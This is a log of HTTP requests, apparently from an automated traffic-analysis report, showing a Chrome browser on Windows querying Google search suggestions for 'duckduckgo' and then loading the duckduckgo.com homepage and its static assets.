Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duck&oit=1&cp=4&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckd&oit=1&cp=5&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /p/AF1QipOcojQD4D7HOKN2YcCUIAZxhlC_VhJ1BSt8DJkC=w92-h92-n-k-no HTTP/1.1host: lh3.googleusercontent.comsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activeuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduc&oit=1&cp=7&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduck&oit=1&cp=8&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /search?q=duckduckgo&oq=duckduc&pf=cs&sourceid=chrome&ie=UTF-8 HTTP/1.1host: www.google.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36purpose: prefetchsec-purpose: prefetchaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckg&oit=1&cp=9&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckgo&oit=1&cp=10&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: AEC=AVh_V2glKdJsL8qB5wKoogb-I_6u4J3kdOtZkPQypjgtso0cUlMLsJhsJCIcookie: NID=524=I74YCtLTQkClDee4yhVezzkNvXF8Lh-4IZUjcui3A4xWjHqGBfm8JFfB59nzrS7FNpz2nNNYG3DI5lm2YtM8pj5DpufWDOj99RFsu_SoXaAopA7U4Z5Y1d2mS-D8IAruSAP9mMR1aKVtCMOMZZRfCzeT-dtWoIJAeIvD7rEOLSka-LmzKjFLQccsVvaArAfSw15GzsmQ1Ygv3qNTyMJLpriority: u=4, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckgo.com&oit=3&cp=14&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: AEC=AVh_V2glKdJsL8qB5wKoogb-I_6u4J3kdOtZkPQypjgtso0cUlMLsJhsJCIcookie: NID=524=I74YCtLTQkClDee4yhVezzkNvXF8Lh-4IZUjcui3A4xWjHqGBfm8JFfB59nzrS7FNpz2nNNYG3DI5lm2YtM8pj5DpufWDOj99RFsu_SoXaAopA7U4Z5Y1d2mS-D8IAruSAP9mMR1aKVtCMOMZZRfCzeT-dtWoIJAeIvD7rEOLSka-LmzKjFLQccsVvaArAfSw15GzsmQ1Ygv3qNTyMJLpriority: u=4, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: duckduckgo.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /static-assets/font/ProximaNova-RegIt-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /static-assets/font/ProximaNova-Reg-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /_next/static/css/4f43f24a80f858fd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /_next/static/css/cbe9deb940241e83.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /static-assets/font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /static-assets/font/ProximaNova-Bold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /static-assets/font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /_next/static/css/b7b5059dc782a8cf.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/webpack-902dadd63ccf3ed3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/7331-e58a744914d0d2ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/7522-0997b064ba451bfa.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/183-8cf06e00742c0795.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/1108-469b2dba26dd3aef.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/8375-2ff8f582fa9b0644.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/7018-71bf9d9d00512827.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/684-9f33fd7065606a5d.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/9409-ec79edf1a159066e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/6670-c4545a71dfc7a774.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/8434-81496f6f33c6bc97.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D-243ab4cdb820daa9.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_buildManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/B-ys9soUGnFD59xVO_HFJ/_ssgManifest.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/css/70e12d59aa4832cd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/main-6185e562568e6345.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/1617-8c004864fca5b9d3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/1740-e0a18841e5b93473.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/6759-9f9ea0a9a829d630.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/framework-19baaf6675f9027b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/9239-fc9e093bd4420738.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/pages/_app-09222264323827fc.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/117-b363b5bad35a955b.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/3133.60921f077c442aa1.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /country.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /privacy-pro-eligible.json HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
